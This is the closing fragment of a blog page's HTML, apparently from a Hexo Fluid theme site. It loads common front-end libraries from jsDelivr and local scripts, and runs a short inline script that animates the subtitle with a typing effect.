    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
